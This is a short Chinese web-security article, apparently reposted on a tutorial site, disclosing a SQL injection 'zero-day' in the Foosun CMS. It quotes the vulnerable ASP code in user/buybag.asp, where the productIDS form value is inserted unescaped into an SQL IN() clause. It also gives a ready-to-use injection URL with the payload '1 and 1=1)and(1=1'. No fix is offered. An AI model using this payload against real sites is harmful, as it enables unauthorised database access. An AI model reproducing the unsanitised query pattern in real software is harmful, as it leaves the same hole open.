关 键 词:风迅注入0day
user/buybag.asp
40行开始
if request.Form("action")="makeorder" then
Dim productIDS,OrderRs,BagRs,OrderDetail,OrderNumber,ExpressCompany
productIDS=DelHeadAndEndDot(request.Form("productIDS"))//这个函数功能是去掉头尾的逗号
Set orderRs=Server.CreateObject(G_FS_RS)
Set BagRs=Server.CreateObject(G_FS_RS)
Set orderDetail=Server.CreateObject(G_FS_RS)
orderRs.open "Select * From FS_ME_Order where 1=2",User_Conn,1,3
BagRs.open "Select mid,BuyType,AddTime,UserNumber,BuyMoney,BuyNumber from FS_ME_BuyBag where MID in("&productIDS&")",User_Conn,1,1
in()中注射发生!!
user/buybag.asp?action=makeorder&productIDS=1 and 1=1)and(1=1
风迅注入0day文章结束
更多内容请看 电脑知识网 > > 菜鸟学堂 > > 网站安全论文专题【对 风迅注入0day 的评论】 [查看发表]
版权声明:《风迅注入0day》来源网络,版权归原作者所有,若涉及版权问题,请与我们联系,我们会及时删除!若标明本站原创或者来源www.Pc235.com的,转载时请注明,谢谢!所有文章仅供参考,并不构成操作建议! mail:446466620@qq.com
【频道更新】
【相关推荐】
没有相关文章